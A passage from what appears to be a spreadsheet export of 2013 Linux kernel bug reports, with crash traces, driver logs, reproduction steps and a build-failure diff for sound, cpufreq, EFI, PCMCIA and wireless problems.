Trace: &lt;NMI&gt; [&lt;ffffffff813fe1ac&gt;] panic+0xb9/0x1cf [&lt;ffffffff810980c0&gt;] watchdog_overflow_callback+0x7c/0xa1 [&lt;ffffffff810bf4d7&gt;] __perf_event_overflow+0x137/0x1c1 [&lt;ffffffff810b96c1&gt;] ? perf_event_update_userpage+0x19/0xe7 [&lt;ffffffff810bfb62&gt;] perf_event_overflow+0x14/0x16 [&lt;ffffffff81013f86&gt;] intel_pmu_handle_irq+0x253/0x2c9 [&lt;ffffffff8100424d&gt;] ? show_regs+0x1fa/0x209 [&lt;ffffffff81401eb0&gt;] perf_event_nmi_handler+0x19/0x1b [&lt;ffffffff814017d6&gt;] nmi_handle+0x48/0x6c [&lt;ffffffff814018cc&gt;] default_do_nmi+0x4d/0x1c2 [&lt;ffffffff81401aac&gt;] do_nmi+0x6b/0xb1 [&lt;ffffffff81400ff7&gt;] end_repeat_nmi+0x1e/0x2e [&lt;ffffffff814006bc&gt;] ? _raw_spin_lock+0x1c/0x20 [&lt;ffffffff814006bc&gt;] ? _raw_spin_lock+0x1c/0x20 [&lt;ffffffff814006bc&gt;] ? _raw_spin_lock+0x1c/0x20 &lt;&lt;EOE&gt;&gt; [&lt;ffffffffa012e291&gt;] kvm_guest_time_update+0x55/0x30d [kvm] [&lt;ffffffffa012e793&gt;] vcpu_enter_guest+0x112/0x64f [kvm] [&lt;ffffffffa03410f5&gt;] ? vmx_vcpu_reset+0x370/0x3e4 [kvm_intel] [&lt;ffffffffa012eda0&gt;] __vcpu_run+0xd0/0x279 [kvm] [&lt;ffffffffa0132836&gt;] kvm_arch_vcpu_ioctl_run+0xe7/0x1a4 [kvm] [&lt;ffffffffa012047e&gt;] kvm_vcpu_ioctl+0x121/0x4e2 [kvm] [&lt;ffffffff81076137&gt;] ? wake_futex+0x57/0x6f [&lt;ffffffff8107623a&gt;] ? futex_wake+0xeb/0xfd [&lt;ffffffff811170de&gt;] do_vfs_ioctl+0x255/0x271 [&lt;ffffffff81078395&gt;] ? sys_futex+0x10b/0x145 [&lt;ffffffff81117153&gt;] sys_ioctl+0x59/0x7d [&lt;ffffffff81407192&gt;] system_call_fastpath+0x16/0x1b Shutting down cpus with NMI</t>
  </si>
  <si>
    <t>modprobe -r snd_hda_intel crashes the kernel</t>
  </si>
  <si>
    <t>3.9.0-rc2-00333-ge204378</t>
  </si>
  <si>
    <t>2013-03-16 11:16 UTC</t>
  </si>
  <si>
    <t>2013-11-13 21:47 UTC</t>
  </si>
  <si>
    <t>Created attachment 95501 [details] config This can be reproduced by modprobe -r snd_hda_intel ; echo -e "\a" modprobe -r snd_hda_intel has caused problems on my Thinkpad T501 since kernel version 3.8. But I only know now how to reproduce it reliably. Bisecting between 3.7 and 3.8 results in commit 8dbd2879e33be37adf40f747a5fb80ef1a6cd150 Merge: b770ea5 d308ba5 Author: Arnd Bergmann &lt;arnd@arndb.de&gt; Date: Thu Nov 15 17:41:21 2012 +0100 Merge branch 'omap/dt' into next/drivers as the first bad commit. I attach screenshots and config-3.9.0-rc2-00333-ge204378</t>
  </si>
  <si>
    <t>sysfs per-cpu cpufreq subdirs/symlinks screwed up after s2ram</t>
  </si>
  <si>
    <t>3.9-rc3</t>
  </si>
  <si>
    <t>2013-03-18 09:13 UTC</t>
  </si>
  <si>
    <t>2013-06-04 00:56 UTC</t>
  </si>
  <si>
    <t>Created attachment 95681 [details] kernel config I have a kde/superkaramba theme that monitors system state, including current cpu frequencies. Testing the 3.9-pre kernels (from git), I noticed that after a suspend2ram and resume, several of the current frequency readouts were missing! Investigating, I found that the per-cpu sysfs cpufreq subdirs/symlinks were screwed up after an s2ram/resume cycle. The CPU's an AMD bulldozer tri-cluster/6-core. Abridged (perms/dates omitted) fresh-boot (good) ls -dl /sys/devices/system/cpu/cpu?/cpufreq : /sys/devices/system/cpu/cpu0/cpufreq/ /sys/devices/system/cpu/cpu1/cpufreq -&gt; ../cpu0/cpufreq/ /sys/devices/system/cpu/cpu2/cpufreq/ /sys/devices/system/cpu/cpu3/cpufreq -&gt; ../cpu2/cpufreq/ /sys/devices/system/cpu/cpu4/cpufreq/ /sys/devices/system/cpu/cpu5/cpufreq -&gt; ../cpu4/cpufreq/ After a s2ram/resume cycle (now bad): /sys/devices/system/cpu/cpu0/cpufreq/ /sys/devices/system/cpu/cpu1/cpufreq -&gt; ../cpu0/cpufreq/ /sys/devices/system/cpu/cpu3/cpufreq/ /sys/devices/system/cpu/cpu5/cpufreq/ The subdirs for cpu2 and 4 disappeared, and cpu3 and 5 now have subdirs instead of symlinks to the (missing) cp2 2 and 4 subdirs. No WONDER the cat of the scaling_cur_freq files ends up returning nothing for some cpus, those files, along with the dirs they were in, disappeared! Additionally, some of the values in the remaining files are screwy. I'll comment on them as I attach... Attached is my config (redirected zcat /proc/config.gz, note that it's monolithic, no modules), and I'll attach dmesg, a grep . of the cpufreq files both good and bad, and cpufreq-info output both good and bad (based on the attachment requests I saw for a different cpufreq bug), as well.</t>
  </si>
  <si>
    <t>efivars.c: fail for write boot entry</t>
  </si>
  <si>
    <t>3.8.3,3.8.4</t>
  </si>
  <si>
    <t>2013-03-20 06:51 UTC</t>
  </si>
  <si>
    <t>2013-11-13 21:33 UTC</t>
  </si>
  <si>
    <t>I have motherboard ASUS F1A75-V PRO. After update kernel to 3.8.3 i cannot add UEFI boot entry. dmesg display. efivars: set_variable() failed: status=8000000000000009 By commit "68d929862e29a8b52a7f2f2f86a0600423b093cd efi: be more paranoid about available space when creating variables" was added code if (!storage_size || size &gt; remaining_size || size &gt; max_size || (remaining_size - size) &lt; (storage_size / 2)) return EFI_OUT_OF_RESOURCES; Function "query_variable_info" sets "max_size" as zero. storage_size is 65536. remaining_size is 47066. In kernel 3.8.2 UEFI boot entry added correctly.</t>
  </si>
  <si>
    <t>[BISECTED]Intel HDA / Nouveau: HDMI audio broken</t>
  </si>
  <si>
    <t>3.8.4</t>
  </si>
  <si>
    <t>2013-03-22 11:06 UTC</t>
  </si>
  <si>
    <t>bugtracker.apriori</t>
  </si>
  <si>
    <t>2013-11-13 17:50 UTC</t>
  </si>
  <si>
    <t>As of kernel 3.8, no sound is transmitted anymore when connecting my Nouveau driven graphics adapter to a TV over HDMI. I'm unsure if this is pertinent to nouveau or to intel_hda. I may reproduce the bug via the following steps: 1. Connect graphics card to TV via HDMI. [Video output switches correctly.] 2. aplay -D something to the Intel HDA device. 3. aplay succeeds, but not sound is heard. I am aware that some TVs disable audio when no signal is playing during a handshake phase, so I kept some audio running when plugging the HDMI and also tried power cycling the TV, to no avail. Also, this did not affect me with the 3.7 kernels. My hardware is the following: &gt; 00:1b.0 Audio device: Intel Corporation 82801I (ICH9 Family) HD Audio Controller (rev 03) &gt; 01:00.0 VGA compatible controller: NVIDIA Corporation G96 [GeForce 9600M GS] (rev a1) Is there any additional information I could provide? The kernel log makes no mention of anything HDMI related.</t>
  </si>
  <si>
    <t>Build fails with CONFIG_I2C=m</t>
  </si>
  <si>
    <t>2013-03-23 15:26 UTC</t>
  </si>
  <si>
    <t>Bernhard Seibold</t>
  </si>
  <si>
    <t>2013-11-13 21:28 UTC</t>
  </si>
  <si>
    <t>The kernel fails to build with CONFIG_I2C=m and CONFIG_V4L2=m. It builds ok with CONFIG_I2C=y. The link error is as follows: + ld -m elf_x86_64 --build-id -o .tmp_vmlinux1 -T /.../linux-3.9-rc3/arch/x86/kernel/vmlinux.lds arch/x86/kernel/head_64.o arch/x86/kernel/head64.o arch/x86/kernel/head.o init/built-in.o --start-group usr/built-in.o arch/x86/built-in.o kernel/built-in.o mm/built-in.o fs/built-in.o ipc/built-in.o security/built-in.o crypto/built-in.o block/built-in.o lib/lib.a arch/x86/lib/lib.a lib/built-in.o arch/x86/lib/built-in.o drivers/built-in.o sound/built-in.o firmware/built-in.o arch/x86/pci/built-in.o arch/x86/power/built-in.o arch/x86/video/built-in.o net/built-in.o --end-group drivers/built-in.o: In function `v4l2_device_unregister': /.../linux-3.9-rc3/drivers/media/v4l2-core/v4l2-device.c:125: undefined reference to `i2c_unregister_device' The commit that introduced this is 7b34be71db533f3e0cf93d53cf62d036cdb5418a. More specifically, it's this change: diff --git a/drivers/media/v4l2-core/v4l2-device.c b/drivers/media/v4l2-core/v4l2-device.c index 98a7f5e..8ed5da2 100644 --- a/drivers/media/v4l2-core/v4l2-device.c +++ b/drivers/media/v4l2-core/v4l2-device.c @@ -112,7 +112,7 @@ void v4l2_device_unregister(struct v4l2_device *v4l2_dev) /* Unregister subdevs */ list_for_each_entry_safe(sd, next, &amp;v4l2_dev-&gt;subdevs, list) { v4l2_device_unregister_subdev(sd); -#if defined(CONFIG_I2C) || (defined(CONFIG_I2C_MODULE) &amp;&amp; defined(MODULE)) +#if IS_ENABLED(CONFIG_I2C) if (sd-&gt;flags &amp; V4L2_SUBDEV_FL_IS_I2C) { struct i2c_client *client = v4l2_get_subdevdata(sd);</t>
  </si>
  <si>
    <t>3.8.x</t>
  </si>
  <si>
    <t>PCMCIA and Firewire PCI config broken after suspend-to-RAM</t>
  </si>
  <si>
    <t>3.8.3</t>
  </si>
  <si>
    <t>2013-03-29 07:01 UTC</t>
  </si>
  <si>
    <t>Martin Demlon</t>
  </si>
  <si>
    <t>2013-05-06 21:10 UTC</t>
  </si>
  <si>
    <t>This is on a JVC MP-XP731 machine, a vintage 2004 (or so) Centrino-based system with video memory mapped in main memory. The last kernel version I've tried that worked fine is 3.2.36. The first kernel version I've tried that broke this is 3.4.24, it's still broken on 3.8.3. The primary symptom: After a suspend-to-memory, PC Card inserts are no longer detected. Looking a bit closer, it turns out that suspend/resume hoses two PCI descriptors: Before suspend, lspci -v outputs: 01:03.0 CardBus bridge: Ricoh Co Ltd RL5c475 (rev b8) Subsystem: ASUSTeK Computer Inc. Device 1804 Flags: bus master, medium devsel, latency 168, IRQ 7 Memory at 30000000 (32-bit, non-prefetchable) [size=4K] Bus: primary=01, secondary=02, subordinate=05, sec-latency=176 Memory window 0: 34000000-37fff000 (prefetchable) Memory window 1: 38000000-3bfff000 I/O window 0: 0000c000-0000c0ff I/O window 1: 0000c400-0000c4ff 16-bit legacy interface ports at 0001 Kernel driver in use: yenta_cardbus 01:03.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C551 IEEE 1394 Controller (prog-if 10 [OHCI]) Subsystem: ASUSTeK Computer Inc. Device 1807 Flags: bus master, medium devsel, latency 64, IRQ 7 Memory at fe8ff000 (32-bit, non-prefetchable) [size=2K] Capabilities: &lt;access denied&gt; After resume, this becomes: 01:03.0 CardBus bridge: Ricoh Co Ltd RL5c475 (rev ff) (prog-if ff) !!! Unknown header type 7f Kernel driver in use: yenta_cardbus 01:03.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C551 IEEE 1394 Controller (rev ff) (prog-if ff) !!! Unknown header type 7f All other descriptors remain ok. Probably a consequence of this are messages pcmcia_socket pcmcia_socket0: *** DANGER *** unable to remove socket power that occur during resume. Looking for the BIOS memory map, in the early kernel messages I discovered PCI: Ignoring host bridge windows from ACPI; if necessary, use "pci=use_crs" and report a bug Suspecting a resource clash anyway, I tried this. The system is now running with $ cat /proc/cmdline BOOT_IMAGE=/boot/vmlinuz root=/dev/sda1 ro noapic pci=use_crs This did not change the behaviour. Realizing I have no actual idea how to further debug this, I'm trying this report.</t>
  </si>
  <si>
    <t>[PATCH]n_tty: keep the data written in raw mode still available  to read after icanon is enabled</t>
  </si>
  <si>
    <t>3.x</t>
  </si>
  <si>
    <t>2013-03-30 15:09 UTC</t>
  </si>
  <si>
    <t>2014-01-20 19:12 UTC</t>
  </si>
  <si>
    <t>Created attachment 96691 [details] the fix If icanon is enabled while the data written in raw mode is still pending, currently it won't be read. The attached patch fixes the problem.</t>
  </si>
  <si>
    <t>acpi error on boot - AE_AML_PACKAGE_LIMIT</t>
  </si>
  <si>
    <t>3.8.5-1</t>
  </si>
  <si>
    <t>2013-04-05 20:23 UTC</t>
  </si>
  <si>
    <t>Marc Collin</t>
  </si>
  <si>
    <t>2013-04-09 03:58 UTC</t>
  </si>
  <si>
    <t>Created attachment 97501 [details] acpi dump i have a laptop lenovo s430 Intel Core i5-3210M intel hd4000 + nvidia GT620M (no proprietary driver installed) when i boot, i get a lot of message acpi error i get theses message when i click to increse or decrease brightness AE_AML_PACKAGE_LIMIT, Index (0x00000000000000FF) is beyond end of object (20121018/exoparg2-418) Method parse/execution failed [\_SB_.PCI0.LPCB.EC0_.BRNS] (Node ffff880467c99c40), AE_AML_PACKAGE_LIMIT (20121018/psparse-537) ACPI: Failed to switch the brightness .. .. brightness key don't work but when i run: xbacklight -inc 10 or xbacklight -dec 10 that work fine. also, i can't go in console mode with: ctrl alt - fx xev return me: KeyPress event, serial 40, synthetic NO, window 0x4c00001, root 0x11c, subw 0x0, time 3409972, (71,118), root:(1197,141), state 0x0, keycode 37 (keysym 0xffe3, Control_L), same_screen YES, XLookupString gives 0 bytes: XmbLookupString gives 0 bytes: XFilterEvent returns: False KeyPress event, serial 40, synthetic NO, window 0x4c00001, root 0x11c, subw 0x0, time 3410525, (71,118), root:(1197,141), state 0x4, keycode 64 (keysym 0xffe9, Alt_L), same_screen YES, XLookupString gives 0 bytes: XmbLookupString gives 0 bytes: XFilterEvent returns: False KeyRelease event, serial 40, synthetic NO, window 0x4c00001, root 0x11c, subw 0x0, time 3412309, (71,118), root:(1197,141), state 0xc, keycode 76 (keysym 0x1008fe0a, XF86Switch_VT_10), same_screen YES, XLookupString gives 0 bytes: XFilterEvent returns: False</t>
  </si>
  <si>
    <t>AR9485 ath9k: wireless connection stops after hours of uptime when power saving mode enabled</t>
  </si>
  <si>
    <t>3.9.0-rc5</t>
  </si>
  <si>
    <t>2013-04-06 00:15 UTC</t>
  </si>
  <si>
    <t>Joel Diaz</t>
  </si>
  <si>
    <t>2013-06-03 13:27 UTC</t>
  </si>
  <si>
    <t>Created attachment 97511 [details] kernel log leading up to and including the failed state Starting with Debian Wheezy, install 3.9.0-rc5 (technically commit b6a9b7f6b1f21735a7456d534dc0e68e61359d2c since that's what was the most current upstream when I grabbed the git repo). Use the Wheezy kernel config as a starting point. Boot the kernel and let it run for a few hours (sometimes days for other kernel I've tried). In this particular instance I was away from home and there was only basic link maintenance going on (ie. no file transfers or anything like that). Eventually, the wireless connection drops and there are thousands of messages in the dmesg output. First a hundred or so of: Apr 5 11:00:44 debian kernel: [57208.372531] ath: phy0: Failed to stop TX DMA, queues=0x004! Followed by the repeating pattern of: Apr 5 17:52:52 debian kernel: [81964.567757] ath: phy0: Failed to wakeup in 500us Apr 5 17:52:52 debian kernel: [81964.639866] ath: phy0: Failed to stop TX DMA, queues=0x10f! Apr 5 17:52:52 debian kernel: [81964.651217] ath: phy0: DMA failed to stop in 10 ms AR_CR=0xffffffff AR_DIAG_SW=0xffffffff DMADBG_7=0xffffffff Apr 5 17:52:52 debian kernel: [81964.651255] ath: phy0: Could not stop RX, we could be confusing the DMA engine when we start RX up Apr 5 17:52:52 debian kernel: [81964.765575] ath: phy0: Chip reset failed Apr 5 17:52:52 debian kernel: [81964.765579] ath: phy0: Unable to reset channel, reset status -22 Nothing terribly interesting about the wireless setup. It is managed by NetworkManager and connects to a WPA2-Personal network to an Apple Airport Extreme base station. The wireless card details from lspci look like garbage after the failure: 02:00.0 Network controller: Atheros Communications Inc. AR9485 Wireless Network Adapter (rev ff) 00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 10: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 20: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff</t>
  </si>
  <si>
    <t>Alexander E. Patrakov</t>
  </si>
  <si>
    <t>iwlwifi iwldvm fail to flush Tx queue</t>
  </si>
  <si>
    <t>2013-04-13 13:16 UTC</t>
  </si>
  <si>
    <t>Florian Reitmeir</t>
  </si>
  <si>
    <t>2016-11-01 19:10 UTC</t>
  </si>
  <si>
    <t>Emmanuel Grumbach</t>
  </si>
  <si>
    <t>42686 43184 43186 43259 48921 49631 60658 69051 79711 83071 86101</t>
  </si>
  <si>
    <t>Hi, i use &gt; uname -a Linux lade 3.9.0-rc4-iwlwifi #3 SMP Sun Mar 24 17:38:52 CET 2013 x86_64 GNU/Linux without any patches, and sometimes i get the error below. i have 2 access points, and i believe the problem is created while roaming between the access points. greetings [44524.547565] iwlwifi 0000:03:00.0: Current SW read_ptr 107 write_ptr 194 [44524.547601] iwl data: 00000000: f9 ff e1 ff ff ff ff ff 9c 03 20 e7 ff fb ff ff .......... ..... [44524.547621] iwlwifi 0000:03:00.0: FH TRBs(0) = 0x00000000 [44524.547641] iwlwifi 0000:03:00.0: FH TRBs(1) = 0x801020de [44524.547660] iwlwifi 0000:03:00.0: FH TRBs(2) = 0x00000000 [44524.547680] iwlwifi 0000:03:00.0: FH TRBs(3) = 0x803000d9 [44524.547700] iwlwifi 0000:03:00.0: FH TRBs(4) = 0x00000000 [44524.547719] iwlwifi 0000:03:00.0: FH TRBs(5) = 0x00000000 [44524.547739] iwlwifi 0000:03:00.0: FH TRBs(6) = 0x00000000 [44524.547759] iwlwifi 0000:03:00.0: FH TRBs(7) = 0x00709039 [44524.547830] iwlwifi 0000:03:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [218,218] [44524.547899] iwlwifi 0000:03:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44524.547968] iwlwifi 0000:03:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [223,223] [44524.548037] iwlwifi 0000:03:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44524.548106] iwlwifi 0000:03:00.0: Q 4 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44524.548175] iwlwifi 0000:03:00.0: Q 5 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44524.548243] iwlwifi 0000:03:00.0: Q 6 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44524.548312] iwlwifi 0000:03:00.0: Q 7 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44524.548381] iwlwifi 0000:03:00.0: Q 8 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44524.548450] iwlwifi 0000:03:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [58,58] [44524.548550] iwlwifi 0000:03:00.0: Q 10 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44524.548629] iwlwifi 0000:03:00.0: Q 11 is active and mapped to fifo 1 ra_tid 0x0000 [52,52] [44524.548698] iwlwifi 0000:03:00.0: Q 12 is active and mapped to fifo 1 ra_tid 0x0000 [107,194] [44524.548767] iwlwifi 0000:03:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44524.548837] iwlwifi 0000:03:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44524.548905] iwlwifi 0000:03:00.0: Q 15 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44524.548975] iwlwifi 0000:03:00.0: Q 16 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44524.549043] iwlwifi 0000:03:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44524.549112] iwlwifi 0000:03:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44524.549181] iwlwifi 0000:03:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44526.548929] iwlwifi 0000:03:00.0: fail to flush all tx fifo queues Q 12 [44526.548940] iwlwifi 0000:03:00.0: Current SW read_ptr 107 write_ptr 194 [44526.548975] iwl data: 00000000: f9 ff e1 ff ff ff ff ff 9c 03 20 e7 ff fb ff ff .......... ..... [44526.548996] iwlwifi 0000:03:00.0: FH TRBs(0) = 0x00000000 [44526.549017] iwlwifi 0000:03:00.0: FH TRBs(1) = 0x801020de [44526.549036] iwlwifi 0000:03:00.0: FH TRBs(2) = 0x00000000 [44526.549056] iwlwifi 0000:03:00.0: FH TRBs(3) = 0x803000da [44526.549076] iwlwifi 0000:03:00.0: FH TRBs(4) = 0x00000000 [44526.549095] iwlwifi 0000:03:00.0: FH TRBs(5) = 0x00000000 [44526.549115] iwlwifi 0000:03:00.0: FH TRBs(6) = 0x00000000 [44526.549135] iwlwifi 0000:03:00.0: FH TRBs(7) = 0x00709041 [44526.549205] iwlwifi 0000:03:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [219,219] [44526.549274] iwlwifi 0000:03:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44526.549343] iwlwifi 0000:03:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [223,223] [44526.549412] iwlwifi 0000:03:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44526.549481] iwlwifi 0000:03:00.0: Q 4 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44526.549550] iwlwifi 0000:03:00.0: Q 5 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44526.549619] iwlwifi 0000:03:00.0: Q 6 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44526.549688] iwlwifi 0000:03:00.0: Q 7 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44526.549756] iwlwifi 0000:03:00.0: Q 8 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44526.549826] iwlwifi 0000:03:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [66,66] [44526.549918] iwlwifi 0000:03:00.0: Q 10 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44526.549992] iwlwifi 0000:03:00.0: Q 11 is active and mapped to fifo 1 ra_tid 0x0000 [52,52] [44526.550080] iwlwifi 0000:03:00.0: Q 12 is active and mapped to fifo 1 ra_tid 0x0000 [107,194] [44526.550149] iwlwifi 0000:03:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44526.550220] iwlwifi 0000:03:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44526.550293] iwlwifi 0000:03:00.0: Q 15 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44526.550362] iwlwifi 0000:03:00.0: Q 16 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44526.550431] iwlwifi 0000:03:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44526.550500] iwlwifi 0000:03:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44526.550569] iwlwifi 0000:03:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44528.550438] iwlwifi 0000:03:00.0: fail to flush all tx fifo queues Q 12 [44528.550451] iwlwifi 0000:03:00.0: Current SW read_ptr 107 write_ptr 194 [44528.550487] iwl data: 00000000: f9 ff e1 ff ff ff ff ff 9c 03 20 e7 ff fb ff ff .......... ..... [44528.550509] iwlwifi 0000:03:00.0: FH TRBs(0) = 0x00000000 [44528.550529] iwlwifi 0000:03:00.0: FH TRBs(1) = 0x801020de [44528.550549] iwlwifi 0000:03:00.0: FH TRBs(2) = 0x00000000 [44528.550568] iwlwifi 0000:03:00.0: FH TRBs(3) = 0x803000db [44528.550588] iwlwifi 0000:03:00.0: FH TRBs(4) = 0x00000000 [44528.550608] iwlwifi 0000:03:00.0: FH TRBs(5) = 0x00000000 [44528.550628] iwlwifi 0000:03:00.0: FH TRBs(6) = 0x00000000 [44528.550648] iwlwifi 0000:03:00.0: FH TRBs(7) = 0x00709047 [44528.550718] iwlwifi 0000:03:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [220,220] [44528.550787] iwlwifi 0000:03:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44528.550856] iwlwifi 0000:03:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [223,223] [44528.550925] iwlwifi 0000:03:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44528.550994] iwlwifi 0000:03:00.0: Q 4 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44528.551063] iwlwifi 0000:03:00.0: Q 5 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44528.551132] iwlwifi 0000:03:00.0: Q 6 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44528.551201] iwlwifi 0000:03:00.0: Q 7 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44528.551269] iwlwifi 0000:03:00.0: Q 8 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44528.551376] iwlwifi 0000:03:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [72,72] [44528.551459] iwlwifi 0000:03:00.0: Q 10 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44528.551528] iwlwifi 0000:03:00.0: Q 11 is active and mapped to fifo 1 ra_tid 0x0000 [52,52] [44528.551597] iwlwifi 0000:03:00.0: Q 12 is active and mapped to fifo 1 ra_tid 0x0000 [107,194] [44528.551666] iwlwifi 0000:03:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44528.551735] iwlwifi 0000:03:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44528.551804] iwlwifi 0000:03:00.0: Q 15 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44528.551873] iwlwifi 0000:03:00.0: Q 16 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44528.551942] iwlwifi 0000:03:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44528.552010] iwlwifi 0000:03:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44528.552079] iwlwifi 0000:03:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44530.551750] iwlwifi 0000:03:00.0: fail to flush all tx fifo queues Q 12 [44530.551761] iwlwifi 0000:03:00.0: Current SW read_ptr 107 write_ptr 194 [44530.551796] iwl data: 00000000: f9 ff e1 ff ff ff ff ff 9c 03 20 e7 ff fb ff ff .......... ..... [44530.551817] iwlwifi 0000:03:00.0: FH TRBs(0) = 0x00000000 [44530.551838] iwlwifi 0000:03:00.0: FH TRBs(1) = 0x801020de [44530.551857] iwlwifi 0000:03:00.0: FH TRBs(2) = 0x00000000 [44530.551878] iwlwifi 0000:03:00.0: FH TRBs(3) = 0x803000dc [44530.551897] iwlwifi 0000:03:00.0: FH TRBs(4) = 0x00000000 [44530.551917] iwlwifi 0000:03:00.0: FH TRBs(5) = 0x00000000 [44530.551937] iwlwifi 0000:03:00.0: FH TRBs(6) = 0x00000000 [44530.551956] iwlwifi 0000:03:00.0: FH TRBs(7) = 0x0070904f [44530.552027] iwlwifi 0000:03:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [221,221] [44530.552097] iwlwifi 0000:03:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44530.552166] iwlwifi 0000:03:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [223,223] [44530.552235] iwlwifi 0000:03:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44530.552303] iwlwifi 0000:03:00.0: Q 4 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [44530.552372] iwlwifi 0000:03:00.0: Q 5 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44530.552441] iwlwifi 0000:03:00.0: Q 6 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [44530.552510] iwlwifi 0000:03:00.0: Q 7 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44530.552579] iwlwifi 0000:03:00.0: Q 8 is active and mapped to fifo 4 ra_tid 0x0000 [0,0] [44530.552648] iwlwifi 0000:03:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [80,80] [44530.552733] iwlwifi 0000:03:00.0: Q 10 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [44530.552803] iwlwifi 0000:03:00.0: Q 11 is active and mapped to fifo 1 ra_tid 0x0000 [52,52] [44530.552882] iwlwifi 0000:03:00.0: Q 12 is active and mapped to fifo 1 ra_tid 0x0000 [107,194] [44530.552955] iwlwifi 0000:03:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44530.553030] iwlwifi 0000:03:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44530.553106] iwlwifi 0000:03:00.0: Q 15 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44530.553182] iwlwifi 0000:03:00.0: Q 16 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44530.553259] iwlwifi 0000:03:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44530.553335] iwlwifi 0000:03:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44530.553407] iwlwifi 0000:03:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [44532.553208] iwlwifi 0000:03:00.0: fail to flush all tx fifo queues Q 12 [44532.553219] iwlwifi 0000:03:00.0: Current SW read_ptr 107 write_ptr 194 [44532.553255] iwl data: 00000000: f9 ff e1 ff ff ff ff ff 9c 03 20 e7 ff fb ff ff .......... ..... [44532.553276] iwlwifi 0000:03:00.0: FH TRBs(0) = 0x00000000 [44532.553296] iwlwifi 0000:03:00.0: FH TRBs(1) = 0x801020de [44532.553316] iwlwifi 0000:03:00.0: FH TRBs(2) = 0x00000000 [44532.553336] iwlwifi 0000:03:00.0: FH TRBs(3) = 0x803000dd 